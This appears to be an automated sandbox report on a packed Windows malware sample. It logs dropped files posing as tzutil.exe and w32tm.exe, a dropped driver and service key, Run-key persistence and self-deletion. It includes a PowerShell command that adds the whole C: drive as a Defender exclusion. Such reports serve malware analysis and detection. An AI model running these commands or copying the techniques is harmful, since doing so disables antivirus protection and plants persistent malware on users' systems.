Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: apphelp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: windows.storage.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: wldp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: cryptsp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: rsaenh.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: cryptbase.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: iphlpapi.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static file information: File size 1274368 > 1048576
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: Raw size of t2 is bigger than: 0x100000 < 0x136000
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbz source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: _prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBw source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Rprod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.0000000000520000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0040BCA0 WaitForSingleObject,GetLocalTime,SystemTimeToFileTime,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,GetFileAttributesW,SHFileOperationW,Sleep,LocalFree,__snwprintf,GetWindowsDirectoryW,__snwprintf,CreateProcessW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,LoadLibraryW,GetProcAddress,GetProcAddress,CloseHandle,CloseHandle,TerminateProcess,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree, 0_2_0040BCA0
                    Source: initial sample | Static PE information: section where entry point is pointing to: t2
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: section name: t0
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: section name: t1
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: section name: t2
                    Source: w32tm.exe.4.dr | Static PE information: section name: s00
                    Source: w32tm.exe.4.dr | Static PE information: section name: s01
                    Source: w32tm.exe.4.dr | Static PE information: section name: s02
                    Source: tzutil.exe.4.dr | Static PE information: section name: ss0
                    Source: tzutil.exe.4.dr | Static PE information: section name: ss1
                    Source: tzutil.exe.4.dr | Static PE information: section name: ss2
                    Source: bS4Vs_8188.sys.8.dr | Static PE information: section name: vs0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0042C275 push ecx; ret 0_2_0042C288
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0049B3CD push ecx; ret 0_2_0049B3E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0040A6A2 push eax; ret 0_2_0040A6A3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004E47D7 push esp; iretd 0_2_004E4805
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004DAD32 push ss; retf 0_2_004DAD82
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C2D40 push rcx; iretd 8_2_008C2D43
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00947E88 push rax; retn 0094h 8_2_00947E89
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 11_2_00000001400136B7 push rsp; iretd 11_2_00000001400136B8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 11_2_00000001400136D2 push rsp; iretd 11_2_00000001400136D3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF88B23D2A5 pushad ; iretd 12_2_00007FF88B23D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF88B35AA77 push esp; retf 12_2_00007FF88B35AA78
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF88B422316 push 8B485F93h; iretd 12_2_00007FF88B42231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF88B24D2A5 pushad ; iretd 14_2_00007FF88B24D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF88B36B9FA push E85B63D7h; ret 14_2_00007FF88B36BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF88B36BA7A push E85B63D7h; ret 14_2_00007FF88B36BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF88B3619DA pushad ; ret 14_2_00007FF88B3619E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF88B432316 push 8B485F92h; iretd 14_2_00007FF88B43231B
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: section name: t2 entropy: 7.990998236108881
                    Source: w32tm.exe.4.dr | Static PE information: section name: s02 entropy: 7.959351043402205
                    Source: tzutil.exe.4.dr | Static PE information: section name: ss2 entropy: 7.983950147296706
                    Source: bS4Vs_8188.sys.8.dr | Static PE information: section name: .text entropy: 7.126561604240753

                    Persistence and Installation Behavior

                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\bS4Vs_8188.sys
                    Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe (dropped file)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\bS4Vs_8188.sys (dropped file)
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe (dropped file)
                    Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe (dropped file)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\bS4Vs_8188.sys (dropped file)

                    Boot Survival

                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\N4nguGs_8188
                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\svchost.exe | File deleted: c:\users\user\desktop\securiteinfo.com.win32.malwarex-gen.15639.2654.exe
